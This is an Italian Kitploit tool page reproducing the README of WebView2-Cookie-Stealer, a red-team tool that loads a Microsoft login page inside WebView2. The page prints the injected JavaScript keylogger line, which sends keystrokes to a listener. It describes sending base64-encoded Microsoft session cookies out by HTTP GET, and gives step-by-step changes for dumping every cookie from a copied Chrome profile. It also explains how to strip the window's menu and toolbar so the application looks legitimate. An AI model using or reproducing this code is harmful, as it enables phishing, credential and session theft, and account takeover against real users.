Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WebView2-Cookie-Stealer — Inietta un keylogger JavaScript nelle pagine WebView2 per catturare le sequenze di tasti ed esfiltrare i cookie dalle sessioni di autenticazione Microsoft tramite richieste HTTP GET. | Kitploit
Strumenti/GitHubGitHub/mrd0x/webview2-cookie-stealer
Attacchi alle PasswordSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniPhishing
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

Inietta un keylogger JavaScript nelle pagine WebView2 per catturare le sequenze di tasti ed esfiltrare i cookie dalle sessioni di autenticazione Microsoft tramite richieste HTTP GET.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
266584 anni faRevisionato da Kitploit

Post del blog

Per maggiori informazioni, si prega di leggere questo post del blog.

Codice sorgente

Questo codice è una versione modificata del codice WebView2 di Microsoft. Il codice attuale può essere ripulito e reso molto migliore.

Demo

Esempio di avvio

Esempio di utilizzo

Utilizzo

Testato su Windows 10 e 11.

Quando il binario viene eseguito, viene caricato https://office.com/login. Un keylogger JavaScript viene iniettato in ogni pagina e le sequenze di tasti vengono inviate a http://127.0.0.1:8080. Inoltre, dopo che l'utente ha effettuato l'accesso con successo, i cookie per login.microsoftonline.com vengono codificati in base64 e inviati a http://127.0.0.1:8080 tramite una richiesta HTTP GET.

Modifica del JavaScript

Se desideri modificare il JavaScript, il codice da modificare è mostrato di seguito alla riga 1096 in AppWindow.cpp.

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Rubare i cookie di Chrome

WebView2 consente di avviare con una cartella dei dati utente (UDF) esistente invece di crearne una nuova. L'UDF contiene tutte le password, le sessioni, i segnalibri, ecc. L'UDF di Chrome si trova in C:\Users\<username>\AppData\Local\Google\Chrome\User Data. Possiamo semplicemente dire a WebView2 di avviare l'istanza utilizzando questo profilo e, all'avvio, estrarre tutti i cookie e trasferirli al server dell'attaccante.

L'unico inconveniente è che WebView2 cerca una cartella chiamata EBWebView invece di User Data (non si sa perché). Copia la cartella User Data e rinominala in EBWebView.

Modifiche necessarie

  • Alla riga 41 in app.cpp:

    • Cambia std::wstring userDataFolder(L""); in std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • La cartella specificata deve contenere la cartella EBWebView da cui WebView2 leggerà.
  • Alla riga 40 in ScenarioCookieManagement.cpp:

    • Cambia GetCookiesHelper(L"https://login.microsoftonline.com"); in GetCookiesHelper(L"");

Quando GetCookiesHelper viene invocato senza specificare alcun sito web, estrarrà tutti i cookie.

Nota: Questo non funzionerà con l'applicazione attuale se c'è una grande quantità di cookie perché l'applicazione li invia tramite una richiesta GET che ha un limite di lunghezza.

Funzioni importanti

Se desideri apportare modifiche al binario, troverai informazioni sulle funzioni importanti di seguito.

  • AppStartPage.cpp - La funzione GetUri() contiene l'URL caricato all'esecuzione del binario.
  • ScenarioCookieManagement.cpp - La funzione SendCookies() contiene l'indirizzo IP e la porta dove vengono inviati i cookie.
  • AppWindow.cpp - La funzione CallCookieFunction() attende che l'URL inizi con https://www.office.com/?auth= e chiama ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - Modifiche estetiche
    • Rimuovere la barra dei menu impostando tutti i valori POPUP a "".
    • Cambia IDS_APP_TITLE e IDC_WEBVIEW2APISAMPLE. Questo è il nome dell'applicazione nella barra del titolo.
    • Cambia IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE e IDI_SMALL. Questi puntano a un file che è l'icona per questa applicazione.
Scarica lo strumento
.ico
  • Toolbar.cpp - itemHeight deve essere impostato a 0 per rimuovere il menu superiore. Questo è già gestito in questo codice.
  • AppWindow.cpp - LoadImage() deve essere commentato. Questo nasconde l'immagine di splash blu. Già gestito in questo codice.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); cambiare l'ultimo parametro in true. Questo nasconde la barra degli strumenti. Già gestito in questo codice.